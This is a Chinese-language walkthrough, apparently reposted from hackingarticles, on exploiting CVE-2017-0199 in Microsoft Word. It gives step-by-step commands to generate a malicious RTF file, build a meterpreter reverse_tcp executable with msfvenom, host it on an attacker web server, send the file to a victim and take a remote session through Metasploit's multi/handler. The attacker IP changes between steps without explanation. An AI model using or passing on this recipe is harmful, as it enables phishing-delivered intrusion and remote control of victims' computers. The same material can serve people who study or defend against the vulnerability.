Microsoft Word可以利用恶意RTF文件进行攻击,在本文中,我们使用python脚本对MS-word 2013进行了0day攻击,该脚本会生成恶意的.rtf文件,并提供目标系统的meterpreter会话。

利用工具包CVE-2017-0199 – v2.0是一个方便的python脚本,它提供了一种快速有效的方式来利用Microsoft RTF RCE。它可以生成恶意的RTF文件,并将metasploit/meterpreter /任何其他有效载荷提供给受害者,而不需要任何复杂的配置。

Let’s start!!!

攻击者:Kali Linux

目标:Windows 10( Microsoft Word 2007 – 2013

打开kali Linux内的终端,然后输入以下内容:

Git clone https://github.com/bhdresh/CVE-2017-0199.git

win10rtf (1)

cd CVE-2017-0199
python cve-2017-0199_toolkit.py -M gen -w sales.rtf -u http://192.168.1.13/raj.doc

此命令会运行一个Python脚本生成Rich Text Format有效载荷,其中-M用于生成RTF文件,-w用于设置RTF文件名sales.rtf ”,-u设置攻击者的IP地址或域名。

win10rtf (2)

你可以在给出的屏幕截图中看到以上命令生成了一个恶意的文件sales .rtf,在我们将这个文件发送给我们的受害者之前,我们需要为它插入后门文件,以便我们可以建立与受害者的反向连接。

win10rtf (3)

重新打开个终端,使用msfvenom来准备一个exe payload以进行攻击后续权限维持。

Msfvenom –p windows/meterpreter/reverse_tcp lhost=192.168.1.13 lport=4444 –f exe > /root/Desktop/raj.exe

win10rtf (4)

现在将raj.exe放入/var/www/html,当然如果你有自己网站就放网站目录里面,确定能访问就OK。

win10rtf (5)

现在键入以下命令,将raj.exe与sales.rtf进行合并。然后,发送这个恶意RTF文件给受害者,同时用 start multi handler连接受害者。

python cve-2017-0199_toolkit.py -M exp -e http://192.168.1.24/raj.exe -l /var/www/html/raj.exe

win10rtf (6)

当受害者打开sale.rtf文件时,你就可以在metasploite框架内看到已经连接上的会话。

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.24
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
meterpreter > sysinfo

win10rtf (7)

*来源:hackingarticles

源链接

Hacking more

...